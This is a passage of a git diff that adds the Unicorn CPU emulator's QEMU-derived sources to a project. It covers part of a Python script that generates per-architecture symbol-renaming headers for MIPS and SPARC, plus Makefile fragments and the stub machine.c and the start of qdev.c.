'helper_msa_div_s_df', + 'helper_msa_div_u_df', + 'helper_msa_mod_s_df', + 'helper_msa_mod_u_df', + 'helper_msa_dotp_s_df', + 'helper_msa_dotp_u_df', + 'helper_msa_srar_df', + 'helper_msa_srlr_df', + 'helper_msa_hadd_s_df', + 'helper_msa_hadd_u_df', + 'helper_msa_hsub_s_df', + 'helper_msa_hsub_u_df', + 'helper_msa_mul_q_df', + 'helper_msa_mulr_q_df', + 'helper_msa_sld_df', + 'helper_msa_maddv_df', + 'helper_msa_msubv_df', + 'helper_msa_dpadd_s_df', + 'helper_msa_dpadd_u_df', + 'helper_msa_dpsub_s_df', + 'helper_msa_dpsub_u_df', + 'helper_msa_binsl_df', + 'helper_msa_binsr_df', + 'helper_msa_madd_q_df', + 'helper_msa_msub_q_df', + 'helper_msa_maddr_q_df', + 'helper_msa_msubr_q_df', + 'helper_msa_splat_df', + 'helper_msa_pckev_df', + 'helper_msa_pckod_df', + 'helper_msa_ilvl_df', + 'helper_msa_ilvr_df', + 'helper_msa_ilvev_df', + 'helper_msa_ilvod_df', + 'helper_msa_vshf_df', + 'helper_msa_sldi_df', + 'helper_msa_splati_df', + 'helper_msa_copy_s_df', + 'helper_msa_copy_u_df', + 'helper_msa_insert_df', + 'helper_msa_insve_df', + 'helper_msa_ctcmsa', + 'helper_msa_cfcmsa', + 'helper_msa_move_v', + 'helper_msa_fill_df', + 'helper_msa_nlzc_df', + 'helper_msa_nloc_df', + 'helper_msa_pcnt_df', + 'helper_msa_fcaf_df', + 'helper_msa_fcun_df', + 'helper_msa_fceq_df', + 'helper_msa_fcueq_df', + 'helper_msa_fclt_df', + 'helper_msa_fcult_df', + 'helper_msa_fcle_df', + 'helper_msa_fcule_df', + 'helper_msa_fsaf_df', + 'helper_msa_fsun_df', + 'helper_msa_fseq_df', + 'helper_msa_fsueq_df', + 'helper_msa_fslt_df', + 'helper_msa_fsult_df', + 'helper_msa_fsle_df', + 'helper_msa_fsule_df', + 'helper_msa_fcor_df', + 'helper_msa_fcune_df', + 'helper_msa_fcne_df', + 'helper_msa_fsor_df', + 'helper_msa_fsune_df', + 'helper_msa_fsne_df', + 'helper_msa_fadd_df', + 'helper_msa_fsub_df', + 'helper_msa_fmul_df', + 'helper_msa_fdiv_df', + 'helper_msa_fmadd_df', + 'helper_msa_fmsub_df', + 'helper_msa_fexp2_df', + 'helper_msa_fexdo_df', + 'helper_msa_ftq_df', + 'helper_msa_fmin_df', + 'helper_msa_fmin_a_df', + 'helper_msa_fmax_df', + 'helper_msa_fmax_a_df', + 'helper_msa_fclass_df', + 'helper_msa_ftrunc_s_df', + 'helper_msa_ftrunc_u_df', + 'helper_msa_fsqrt_df', + 'helper_msa_frsqrt_df', + 'helper_msa_frcp_df', + 'helper_msa_frint_df', + 'helper_msa_flog2_df', + 'helper_msa_fexupl_df', + 'helper_msa_fexupr_df', + 'helper_msa_ffql_df', + 'helper_msa_ffqr_df', + 'helper_msa_ftint_s_df', + 'helper_msa_ftint_u_df', + 'helper_msa_ffint_s_df', + 'helper_msa_ffint_u_df', + 'helper_paddsb', + 'helper_paddusb', + 'helper_paddsh', + 'helper_paddush', + 'helper_paddb', + 'helper_paddh', + 'helper_paddw', + 'helper_psubsb', + 'helper_psubusb', + 'helper_psubsh', + 'helper_psubush', + 'helper_psubb', + 'helper_psubh', + 'helper_psubw', + 'helper_pshufh', + 'helper_packsswh', + 'helper_packsshb', + 'helper_packushb', + 'helper_punpcklwd', + 'helper_punpckhwd', + 'helper_punpcklhw', + 'helper_punpckhhw', + 'helper_punpcklbh', + 'helper_punpckhbh', + 'helper_pavgh', + 'helper_pavgb', + 'helper_pmaxsh', + 'helper_pminsh', + 'helper_pmaxub', + 'helper_pminub', + 'helper_pcmpeqw', + 'helper_pcmpgtw', + 'helper_pcmpeqh', + 'helper_pcmpgth', + 'helper_pcmpeqb', + 'helper_pcmpgtb', + 'helper_psllw', + 'helper_psrlw', + 'helper_psraw', + 'helper_psllh', + 'helper_psrlh', + 'helper_psrah', + 'helper_pmullh', + 'helper_pmulhh', + 'helper_pmulhuh', + 'helper_pmaddhw', + 'helper_pasubub', + 'helper_biadd', + 'helper_pmovmskb', + 'helper_absq_s_ph', + 'helper_absq_s_qb', + 'helper_absq_s_w', + 'helper_addqh_ph', + 'helper_addqh_r_ph', + 'helper_addqh_r_w', + 'helper_addqh_w', + 'helper_adduh_qb', + 'helper_adduh_r_qb', + 'helper_subqh_ph', + 'helper_subqh_r_ph', + 'helper_subqh_r_w', + 'helper_subqh_w', + 'helper_addq_ph', + 'helper_addq_s_ph', + 'helper_addq_s_w', + 'helper_addu_ph', + 'helper_addu_qb', + 'helper_addu_s_ph', + 'helper_addu_s_qb', + 'helper_subq_ph', + 'helper_subq_s_ph', + 'helper_subq_s_w', + 'helper_subu_ph', + 'helper_subu_qb', + 'helper_subu_s_ph', + 'helper_subu_s_qb', + 'helper_subuh_qb', + 'helper_subuh_r_qb', + 'helper_addsc', + 'helper_addwc', + 'helper_modsub', + 'helper_raddu_w_qb', + 'helper_precr_qb_ph', + 'helper_precrq_qb_ph', + 'helper_precr_sra_ph_w', + 'helper_precr_sra_r_ph_w', + 'helper_precrq_ph_w', + 'helper_precrq_rs_ph_w', + 'helper_precrqu_s_qb_ph', + 'helper_precequ_ph_qbl', + 'helper_precequ_ph_qbr', + 'helper_precequ_ph_qbla', + 'helper_precequ_ph_qbra', + 'helper_preceu_ph_qbl', + 'helper_preceu_ph_qbr', + 'helper_preceu_ph_qbla', + 'helper_preceu_ph_qbra', + 'helper_shll_qb', + 'helper_shrl_qb', + 'helper_shra_qb', + 'helper_shra_r_qb', + 'helper_shll_ph', + 'helper_shll_s_ph', + 'helper_shll_s_w', + 'helper_shra_r_w', + 'helper_shrl_ph', + 'helper_shra_ph', + 'helper_shra_r_ph', + 'helper_muleu_s_ph_qbl', + 'helper_muleu_s_ph_qbr', + 'helper_mulq_rs_ph', + 'helper_mul_ph', + 'helper_mul_s_ph', + 'helper_mulq_s_ph', + 'helper_muleq_s_w_phl', + 'helper_muleq_s_w_phr', + 'helper_mulsaq_s_w_ph', + 'helper_mulsa_w_ph', + 'helper_dpau_h_qbl', + 'helper_dpau_h_qbr', + 'helper_dpsu_h_qbl', + 'helper_dpsu_h_qbr', + 'helper_dpa_w_ph', + 'helper_dpax_w_ph', + 'helper_dps_w_ph', + 'helper_dpsx_w_ph', + 'helper_dpaq_s_w_ph', + 'helper_dpaqx_s_w_ph', + 'helper_dpsq_s_w_ph', + 'helper_dpsqx_s_w_ph', + 'helper_dpaqx_sa_w_ph', + 'helper_dpsqx_sa_w_ph', + 'helper_dpaq_sa_l_w', + 'helper_dpsq_sa_l_w', + 'helper_maq_s_w_phl', + 'helper_maq_s_w_phr', + 'helper_maq_sa_w_phl', + 'helper_maq_sa_w_phr', + 'helper_mulq_s_w', + 'helper_mulq_rs_w', + 'helper_bitrev', + 'helper_insv', + 'helper_cmpgu_eq_qb', + 'helper_cmpgu_lt_qb', + 'helper_cmpgu_le_qb', + 'helper_cmpu_eq_qb', + 'helper_cmpu_lt_qb', + 'helper_cmpu_le_qb', + 'helper_cmp_eq_ph', + 'helper_cmp_lt_ph', + 'helper_cmp_le_ph', + 'helper_pick_qb', + 'helper_pick_ph', + 'helper_packrl_ph', + 'helper_extr_w', + 'helper_extr_r_w', + 'helper_extr_rs_w', + 'helper_extr_s_h', + 'helper_extp', + 'helper_extpdp', + 'helper_shilo', + 'helper_mthlip', + 'cpu_wrdsp', + 'helper_wrdsp', + 'cpu_rddsp', + 'helper_rddsp', + 'helper_raise_exception_err', + 'helper_clo', + 'helper_clz', + 'helper_muls', + 'helper_mulsu', + 'helper_macc', + 'helper_macchi', + 'helper_maccu', + 'helper_macchiu', + 'helper_msac', + 'helper_msachi', + 'helper_msacu', + 'helper_msachiu', + 'helper_mulhi', + 'helper_mulhiu', + 'helper_mulshi', + 'helper_mulshiu', + 'helper_bitswap', + 'helper_ll', + 'helper_sc', + 'helper_swl', + 'helper_swr', + 'helper_lwm', + 'helper_swm', + 'helper_mfc0_mvpcontrol', + 'helper_mfc0_mvpconf0', + 'helper_mfc0_mvpconf1', + 'helper_mfc0_random', + 'helper_mfc0_tcstatus', + 'helper_mftc0_tcstatus', + 'helper_mfc0_tcbind', + 'helper_mftc0_tcbind', + 'helper_mfc0_tcrestart', + 'helper_mftc0_tcrestart', + 'helper_mfc0_tchalt', + 'helper_mftc0_tchalt', + 'helper_mfc0_tccontext', + 'helper_mftc0_tccontext', + 'helper_mfc0_tcschedule', + 'helper_mftc0_tcschedule', + 'helper_mfc0_tcschefback', + 'helper_mftc0_tcschefback', + 'helper_mfc0_count', + 'helper_mftc0_entryhi', + 'helper_mftc0_cause', + 'helper_mftc0_status', + 'helper_mfc0_lladdr', + 'helper_mfc0_watchlo', + 'helper_mfc0_watchhi', + 'helper_mfc0_debug', + 'helper_mftc0_debug', + 'helper_mtc0_index', + 'helper_mtc0_mvpcontrol', + 'helper_mtc0_vpecontrol', + 'helper_mttc0_vpecontrol', + 'helper_mftc0_vpecontrol', + 'helper_mftc0_vpeconf0', + 'helper_mtc0_vpeconf0', + 'helper_mttc0_vpeconf0', + 'helper_mtc0_vpeconf1', + 'helper_mtc0_yqmask', + 'helper_mtc0_vpeopt', + 'helper_mtc0_entrylo0', + 'helper_mtc0_tcstatus', + 'helper_mttc0_tcstatus', + 'helper_mtc0_tcbind', + 'helper_mttc0_tcbind', + 'helper_mtc0_tcrestart', + 'helper_mttc0_tcrestart', + 'helper_mtc0_tchalt', + 'helper_mttc0_tchalt', + 'helper_mtc0_tccontext', + 'helper_mttc0_tccontext', + 'helper_mtc0_tcschedule', + 'helper_mttc0_tcschedule', + 'helper_mtc0_tcschefback', + 'helper_mttc0_tcschefback', + 'helper_mtc0_entrylo1', + 'helper_mtc0_context', + 'helper_mtc0_pagemask', + 'helper_mtc0_pagegrain', + 'helper_mtc0_wired', + 'helper_mtc0_srsconf0', + 'helper_mtc0_srsconf1', + 'helper_mtc0_srsconf2', + 'helper_mtc0_srsconf3', + 'helper_mtc0_srsconf4', + 'helper_mtc0_hwrena', + 'helper_mtc0_count', + 'helper_mtc0_entryhi', + 'helper_mttc0_entryhi', + 'helper_mtc0_compare', + 'helper_mtc0_status', + 'helper_mttc0_status', + 'helper_mtc0_intctl', + 'helper_mtc0_srsctl', + 'helper_mtc0_cause', + 'helper_mttc0_cause', + 'helper_mftc0_epc', + 'helper_mftc0_ebase', + 'helper_mtc0_ebase', + 'helper_mttc0_ebase', + 'helper_mftc0_configx', + 'helper_mtc0_config0', + 'helper_mtc0_config2', + 'helper_mtc0_config4', + 'helper_mtc0_config5', + 'helper_mtc0_lladdr', + 'helper_mtc0_watchlo', + 'helper_mtc0_watchhi', + 'helper_mtc0_xcontext', + 'helper_mtc0_framemask', + 'helper_mtc0_debug', + 'helper_mttc0_debug', + 'helper_mtc0_performance0', + 'helper_mtc0_taglo', + 'helper_mtc0_datalo', + 'helper_mtc0_taghi', + 'helper_mtc0_datahi', + 'helper_mftgpr', + 'helper_mftlo', + 'helper_mfthi', + 'helper_mftacx', + 'helper_mftdsp', + 'helper_mttgpr', + 'helper_mttlo', + 'helper_mtthi', + 'helper_mttacx', + 'helper_mttdsp', + 'helper_dmt', + 'helper_emt', + 'helper_dvpe', + 'helper_evpe', + 'helper_fork', + 'helper_yield', + 'r4k_helper_tlbinv', + 'r4k_helper_tlbinvf', + 'r4k_helper_tlbwi', + 'r4k_helper_tlbwr', + 'r4k_helper_tlbp', + 'r4k_helper_tlbr', + 'helper_tlbwi', + 'helper_tlbwr', + 'helper_tlbp', + 'helper_tlbr', + 'helper_tlbinv', + 'helper_tlbinvf', + 'helper_di', + 'helper_ei', + 'helper_eret', + 'helper_deret', + 'helper_rdhwr_cpunum', + 'helper_rdhwr_synci_step', + 'helper_rdhwr_cc', + 'helper_rdhwr_ccres', + 'helper_pmon', + 'helper_wait', + 'mips_cpu_do_unaligned_access', + 'mips_cpu_unassigned_access', + 'ieee_rm', + 'helper_cfc1', + 'helper_ctc1', + 'ieee_ex_to_mips', + 'helper_float_sqrt_d', + 'helper_float_sqrt_s', + 'helper_float_cvtd_s', + 'helper_float_cvtd_w', + 'helper_float_cvtd_l', + 'helper_float_cvtl_d', + 'helper_float_cvtl_s', + 'helper_float_cvtps_pw', + 'helper_float_cvtpw_ps', + 'helper_float_cvts_d', + 'helper_float_cvts_w', + 'helper_float_cvts_l', + 'helper_float_cvts_pl', + 'helper_float_cvts_pu', + 'helper_float_cvtw_s', + 'helper_float_cvtw_d', + 'helper_float_roundl_d', + 'helper_float_roundl_s', + 'helper_float_roundw_d', + 'helper_float_roundw_s', + 'helper_float_truncl_d', + 'helper_float_truncl_s', + 'helper_float_truncw_d', + 'helper_float_truncw_s', + 'helper_float_ceill_d', + 'helper_float_ceill_s', + 'helper_float_ceilw_d', + 'helper_float_ceilw_s', + 'helper_float_floorl_d', + 'helper_float_floorl_s', + 'helper_float_floorw_d', + 'helper_float_floorw_s', + 'helper_float_abs_d', + 'helper_float_abs_s', + 'helper_float_abs_ps', + 'helper_float_chs_d', + 'helper_float_chs_s', + 'helper_float_chs_ps', + 'helper_float_maddf_s', + 'helper_float_maddf_d', + 'helper_float_msubf_s', + 'helper_float_msubf_d', + 'helper_float_max_s', + 'helper_float_max_d', + 'helper_float_maxa_s', + 'helper_float_maxa_d', + 'helper_float_min_s', + 'helper_float_min_d', + 'helper_float_mina_s', + 'helper_float_mina_d', + 'helper_float_rint_s', + 'helper_float_rint_d', + 'helper_float_class_s', + 'helper_float_class_d', + 'helper_float_recip_d', + 'helper_float_recip_s', + 'helper_float_rsqrt_d', + 'helper_float_rsqrt_s', + 'helper_float_recip1_d', + 'helper_float_recip1_s', + 'helper_float_recip1_ps', + 'helper_float_rsqrt1_d', + 'helper_float_rsqrt1_s', + 'helper_float_rsqrt1_ps', + 'helper_float_add_d', + 'helper_float_add_s', + 'helper_float_add_ps', + 'helper_float_sub_d', + 'helper_float_sub_s', + 'helper_float_sub_ps', + 'helper_float_mul_d', + 'helper_float_mul_s', + 'helper_float_mul_ps', + 'helper_float_div_d', + 'helper_float_div_s', + 'helper_float_div_ps', + 'helper_float_madd_d', + 'helper_float_madd_s', + 'helper_float_madd_ps', + 'helper_float_msub_d', + 'helper_float_msub_s', + 'helper_float_msub_ps', + 'helper_float_nmadd_d', + 'helper_float_nmadd_s', + 'helper_float_nmadd_ps', + 'helper_float_nmsub_d', + 'helper_float_nmsub_s', + 'helper_float_nmsub_ps', + 'helper_float_recip2_d', + 'helper_float_recip2_s', + 'helper_float_recip2_ps', + 'helper_float_rsqrt2_d', + 'helper_float_rsqrt2_s', + 'helper_float_rsqrt2_ps', + 'helper_float_addr_ps', + 'helper_float_mulr_ps', + 'helper_cmp_d_f', + 'helper_cmpabs_d_f', + 'helper_cmp_d_un', + 'helper_cmpabs_d_un', + 'helper_cmp_d_eq', + 'helper_cmpabs_d_eq', + 'helper_cmp_d_ueq', + 'helper_cmpabs_d_ueq', + 'helper_cmp_d_olt', + 'helper_cmpabs_d_olt', + 'helper_cmp_d_ult', + 'helper_cmpabs_d_ult', + 'helper_cmp_d_ole', + 'helper_cmpabs_d_ole', + 'helper_cmp_d_ule', + 'helper_cmpabs_d_ule', + 'helper_cmp_d_sf', + 'helper_cmpabs_d_sf', + 'helper_cmp_d_ngle', + 'helper_cmpabs_d_ngle', + 'helper_cmp_d_seq', + 'helper_cmpabs_d_seq', + 'helper_cmp_d_ngl', + 'helper_cmpabs_d_ngl', + 'helper_cmp_d_lt', + 'helper_cmpabs_d_lt', + 'helper_cmp_d_nge', + 'helper_cmpabs_d_nge', + 'helper_cmp_d_le', + 'helper_cmpabs_d_le', + 'helper_cmp_d_ngt', + 'helper_cmpabs_d_ngt', + 'helper_cmp_s_f', + 'helper_cmpabs_s_f', + 'helper_cmp_s_un', + 'helper_cmpabs_s_un', + 'helper_cmp_s_eq', + 'helper_cmpabs_s_eq', + 'helper_cmp_s_ueq', + 'helper_cmpabs_s_ueq', + 'helper_cmp_s_olt', + 'helper_cmpabs_s_olt', + 'helper_cmp_s_ult', + 'helper_cmpabs_s_ult', + 'helper_cmp_s_ole', + 'helper_cmpabs_s_ole', + 'helper_cmp_s_ule', + 'helper_cmpabs_s_ule', + 'helper_cmp_s_sf', + 'helper_cmpabs_s_sf', + 'helper_cmp_s_ngle', + 'helper_cmpabs_s_ngle', + 'helper_cmp_s_seq', + 'helper_cmpabs_s_seq', + 'helper_cmp_s_ngl', + 'helper_cmpabs_s_ngl', + 'helper_cmp_s_lt', + 'helper_cmpabs_s_lt', + 'helper_cmp_s_nge', + 'helper_cmpabs_s_nge', + 'helper_cmp_s_le', + 'helper_cmpabs_s_le', + 'helper_cmp_s_ngt', + 'helper_cmpabs_s_ngt', + 'helper_cmp_ps_f', + 'helper_cmpabs_ps_f', + 'helper_cmp_ps_un', + 'helper_cmpabs_ps_un', + 'helper_cmp_ps_eq', + 'helper_cmpabs_ps_eq', + 'helper_cmp_ps_ueq', + 'helper_cmpabs_ps_ueq', + 'helper_cmp_ps_olt', + 'helper_cmpabs_ps_olt', + 'helper_cmp_ps_ult', + 'helper_cmpabs_ps_ult', + 'helper_cmp_ps_ole', + 'helper_cmpabs_ps_ole', + 'helper_cmp_ps_ule', + 'helper_cmpabs_ps_ule', + 'helper_cmp_ps_sf', + 'helper_cmpabs_ps_sf', + 'helper_cmp_ps_ngle', + 'helper_cmpabs_ps_ngle', + 'helper_cmp_ps_seq', + 'helper_cmpabs_ps_seq', + 'helper_cmp_ps_ngl', + 'helper_cmpabs_ps_ngl', + 'helper_cmp_ps_lt', + 'helper_cmpabs_ps_lt', + 'helper_cmp_ps_nge', + 'helper_cmpabs_ps_nge', + 'helper_cmp_ps_le', + 'helper_cmpabs_ps_le', + 'helper_cmp_ps_ngt', + 'helper_cmpabs_ps_ngt', + 'helper_r6_cmp_d_af', + 'helper_r6_cmp_d_un', + 'helper_r6_cmp_d_eq', + 'helper_r6_cmp_d_ueq', + 'helper_r6_cmp_d_lt', + 'helper_r6_cmp_d_ult', + 'helper_r6_cmp_d_le', + 'helper_r6_cmp_d_ule', + 'helper_r6_cmp_d_saf', + 'helper_r6_cmp_d_sun', + 'helper_r6_cmp_d_seq', + 'helper_r6_cmp_d_sueq', + 'helper_r6_cmp_d_slt', + 'helper_r6_cmp_d_sult', + 'helper_r6_cmp_d_sle', + 'helper_r6_cmp_d_sule', + 'helper_r6_cmp_d_or', + 'helper_r6_cmp_d_une', + 'helper_r6_cmp_d_ne', + 'helper_r6_cmp_d_sor', + 'helper_r6_cmp_d_sune', + 'helper_r6_cmp_d_sne', + 'helper_r6_cmp_s_af', + 'helper_r6_cmp_s_un', + 'helper_r6_cmp_s_eq', + 'helper_r6_cmp_s_ueq', + 'helper_r6_cmp_s_lt', + 'helper_r6_cmp_s_ult', + 'helper_r6_cmp_s_le', + 'helper_r6_cmp_s_ule', + 'helper_r6_cmp_s_saf', + 'helper_r6_cmp_s_sun', + 'helper_r6_cmp_s_seq', + 'helper_r6_cmp_s_sueq', + 'helper_r6_cmp_s_slt', + 'helper_r6_cmp_s_sult', + 'helper_r6_cmp_s_sle', + 'helper_r6_cmp_s_sule', + 'helper_r6_cmp_s_or', + 'helper_r6_cmp_s_une', + 'helper_r6_cmp_s_ne', + 'helper_r6_cmp_s_sor', + 'helper_r6_cmp_s_sune', + 'helper_r6_cmp_s_sne', + 'helper_msa_ld_df', + 'helper_msa_st_df', + 'no_mmu_map_address', + 'fixed_mmu_map_address', + 'r4k_map_address', + 'mips_cpu_get_phys_page_debug', + 'mips_cpu_handle_mmu_fault', + 'cpu_mips_translate_address', + 'exception_resume_pc', + 'mips_cpu_do_interrupt', + 'mips_cpu_exec_interrupt', + 'r4k_invalidate_tlb', + 'helper_absq_s_ob', + 'helper_absq_s_qh', + 'helper_absq_s_pw', + 'helper_adduh_ob', + 'helper_adduh_r_ob', + 'helper_subuh_ob', + 'helper_subuh_r_ob', + 'helper_addq_pw', + 'helper_addq_qh', + 'helper_addq_s_pw', + 'helper_addq_s_qh', + 'helper_addu_ob', + 'helper_addu_qh', + 'helper_addu_s_ob', + 'helper_addu_s_qh', + 'helper_subq_pw', + 'helper_subq_qh', + 'helper_subq_s_pw', + 'helper_subq_s_qh', + 'helper_subu_ob', + 'helper_subu_qh', + 'helper_subu_s_ob', + 'helper_subu_s_qh', + 'helper_raddu_l_ob', + 'helper_precr_ob_qh', + 'helper_precr_sra_qh_pw', + 'helper_precr_sra_r_qh_pw', + 'helper_precrq_ob_qh', + 'helper_precrq_qh_pw', + 'helper_precrq_rs_qh_pw', + 'helper_precrq_pw_l', + 'helper_precrqu_s_ob_qh', + 'helper_preceq_pw_qhl', + 'helper_preceq_pw_qhr', + 'helper_preceq_pw_qhla', + 'helper_preceq_pw_qhra', + 'helper_precequ_qh_obl', + 'helper_precequ_qh_obr', + 'helper_precequ_qh_obla', + 'helper_precequ_qh_obra', + 'helper_preceu_qh_obl', + 'helper_preceu_qh_obr', + 'helper_preceu_qh_obla', + 'helper_preceu_qh_obra', + 'helper_shll_ob', + 'helper_shrl_ob', + 'helper_shra_ob', + 'helper_shra_r_ob', + 'helper_shll_qh', + 'helper_shll_s_qh', + 'helper_shrl_qh', + 'helper_shra_qh', + 'helper_shra_r_qh', + 'helper_shll_pw', + 'helper_shll_s_pw', + 'helper_shra_pw', + 'helper_shra_r_pw', + 'helper_muleu_s_qh_obl', + 'helper_muleu_s_qh_obr', + 'helper_mulq_rs_qh', + 'helper_muleq_s_pw_qhl', + 'helper_muleq_s_pw_qhr', + 'helper_mulsaq_s_w_qh', + 'helper_dpau_h_obl', + 'helper_dpau_h_obr', + 'helper_dpsu_h_obl', + 'helper_dpsu_h_obr', + 'helper_dpa_w_qh', + 'helper_dpaq_s_w_qh', + 'helper_dps_w_qh', + 'helper_dpsq_s_w_qh', + 'helper_dpaq_sa_l_pw', + 'helper_dpsq_sa_l_pw', + 'helper_mulsaq_s_l_pw', + 'helper_maq_s_w_qhll', + 'helper_maq_s_w_qhlr', + 'helper_maq_s_w_qhrl', + 'helper_maq_s_w_qhrr', + 'helper_maq_sa_w_qhll', + 'helper_maq_sa_w_qhlr', + 'helper_maq_sa_w_qhrl', + 'helper_maq_sa_w_qhrr', + 'helper_maq_s_l_pwl', + 'helper_maq_s_l_pwr', + 'helper_dmadd', + 'helper_dmaddu', + 'helper_dmsub', + 'helper_dmsubu', + 'helper_dinsv', + 'helper_cmpgu_eq_ob', + 'helper_cmpgu_lt_ob', + 'helper_cmpgu_le_ob', + 'helper_cmpu_eq_ob', + 'helper_cmpu_lt_ob', + 'helper_cmpu_le_ob', + 'helper_cmp_eq_qh', + 'helper_cmp_lt_qh', + 'helper_cmp_le_qh', + 'helper_cmp_eq_pw', + 'helper_cmp_lt_pw', + 'helper_cmp_le_pw', + 'helper_cmpgdu_eq_ob', + 'helper_cmpgdu_lt_ob', + 'helper_cmpgdu_le_ob', + 'helper_pick_ob', + 'helper_pick_qh', + 'helper_pick_pw', + 'helper_packrl_pw', + 'helper_dextr_w', + 'helper_dextr_r_w', + 'helper_dextr_rs_w', + 'helper_dextr_l', + 'helper_dextr_r_l', + 'helper_dextr_rs_l', + 'helper_dextr_s_h', + 'helper_dextp', + 'helper_dextpdp', + 'helper_dshilo', + 'helper_dmthlip', + 'helper_dclo', + 'helper_dclz', + 'helper_dbitswap', + 'helper_lld', + 'helper_scd', + 'helper_sdl', + 'helper_sdr', + 'helper_ldm', + 'helper_sdm', + 'helper_dmfc0_tcrestart', + 'helper_dmfc0_tchalt', + 'helper_dmfc0_tccontext', + 'helper_dmfc0_tcschedule', + 'helper_dmfc0_tcschefback', + 'helper_dmfc0_lladdr', + 'helper_dmfc0_watchlo', + 'helper_dmtc0_entrylo0', + 'helper_dmtc0_entrylo1', + 'mips_reg_reset', + 'mips_reg_read', + 'mips_reg_write', + 'mips_tcg_init', + 'mips_cpu_list', + 'mips_release', + 'MIPS64_REGS_STORAGE_SIZE', + 'MIPS_REGS_STORAGE_SIZE' +) + +sparc_symbols = ( + 'cpu_sparc_exec', + 'helper_compute_psr', + 'helper_compute_C_icc', + 'cpu_sparc_init', + 'cpu_sparc_set_id', + 'sparc_cpu_register_types', + 'helper_fadds', + 'helper_faddd', + 'helper_faddq', + 'helper_fsubs', + 'helper_fsubd', + 'helper_fsubq', + 'helper_fmuls', + 'helper_fmuld', + 'helper_fmulq', + 'helper_fdivs', + 'helper_fdivd', + 'helper_fdivq', + 'helper_fsmuld', + 'helper_fdmulq', + 'helper_fnegs', + 'helper_fitos', + 'helper_fitod', + 'helper_fitoq', + 'helper_fdtos', + 'helper_fstod', + 'helper_fqtos', + 'helper_fstoq', + 'helper_fqtod', + 'helper_fdtoq', + 'helper_fstoi', + 'helper_fdtoi', + 'helper_fqtoi', + 'helper_fabss', + 'helper_fsqrts', + 'helper_fsqrtd', + 'helper_fsqrtq', + 'helper_fcmps', + 'helper_fcmpd', + 'helper_fcmpes', + 'helper_fcmped', + 'helper_fcmpq', + 'helper_fcmpeq', + 'helper_ldfsr', + 'helper_debug', + 'helper_udiv_cc', + 'helper_sdiv_cc', + 'helper_taddcctv', + 'helper_tsubcctv', + 'sparc_cpu_do_interrupt', + 'helper_check_align', + 'helper_ld_asi', + 'helper_st_asi', + 'helper_cas_asi', + 'helper_ldqf', + 'helper_stqf', + 'sparc_cpu_unassigned_access', + 'sparc_cpu_do_unaligned_access', + 'sparc_cpu_handle_mmu_fault', + 'dump_mmu', + 'sparc_cpu_get_phys_page_debug', + 'sparc_reg_reset', + 'sparc_reg_read', + 'sparc_reg_write', + 'gen_intermediate_code_init', + 'cpu_set_cwp', + 'cpu_get_psr', + 'cpu_put_psr', + 'cpu_cwp_inc', + 'cpu_cwp_dec', + 'helper_save', + 'helper_restore') + + +if __name__ == '__main__': + arch = sys.argv[1] + + print("/* Autogen header for Unicorn Engine - DONOT MODIFY */") + print("#ifndef UNICORN_AUTOGEN_%s_H" %arch.upper()) + print("#define UNICORN_AUTOGEN_%s_H" %arch.upper()) + + for s in symbols: + print("#define %s %s_%s" %(s, s, arch)) + + if 'arm' in arch: + for s in arm_symbols: + print("#define %s %s_%s" %(s, s, arch)) + + if 'aarch64' in arch: + for s in aarch64_symbols: + print("#define %s %s_%s" %(s, s, arch)) + + if 'mips' in arch: + for s in mips_symbols: + print("#define %s %s_%s" %(s, s, arch)) + + if 'sparc' in arch: + for s in sparc_symbols: + print("#define %s %s_%s" %(s, s, arch)) + + print("#endif") + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/Makefile.objs new file mode 100644 index 0000000..08a0be1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/Makefile.objs @@ -0,0 +1,4 @@ +devices-dirs-$(CONFIG_SOFTMMU) += intc/ +devices-dirs-y += core/ +common-obj-y += $(devices-dirs-y) +obj-y += $(devices-dirs-y) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/Makefile.objs new file mode 100644 index 0000000..9d40223 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/Makefile.objs @@ -0,0 +1,3 @@ +# core qdev-related obj files, also used by *-user: +common-obj-y += qdev.o +common-obj-$(CONFIG_SOFTMMU) += machine.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/machine.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/machine.c new file mode 100644 index 0000000..fa36062 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/machine.c @@ -0,0 +1,47 @@ +/* + * QEMU Machine + * + * Copyright (C) 2014 Red Hat Inc + * + * Authors: + * Marcel Apfelbaum <marcel.a@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ + +#include "hw/boards.h" + +static void machine_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void machine_finalize(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static const TypeInfo machine_info = { + TYPE_MACHINE, + TYPE_OBJECT, + + sizeof(MachineClass), + sizeof(MachineState), + NULL, + + machine_initfn, + NULL, + machine_finalize, + + NULL, + + NULL, + NULL, + NULL, + + true, +}; + +void machine_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &machine_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/qdev.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/qdev.c new file mode 100644 index 0000000..8b98f2a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/qdev.c @@ -0,0 +1,344 @@ +/* + * Dynamic device configuration and creation. + * + * Copyright (c) 2009 CodeSourcery + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +/* The theory here is that it should be possible to create a machine without + knowledge of specific devices. Historically board init routines have + passed a bunch of arguments to each device, requiring the board know + exactly which device it is dealing with. This file provides an abstract + API for device configuration and initialization. Devices will generally + inherit from a particular bus (e.g. PCI or I2C) rather than + this API directly. */ + +#include 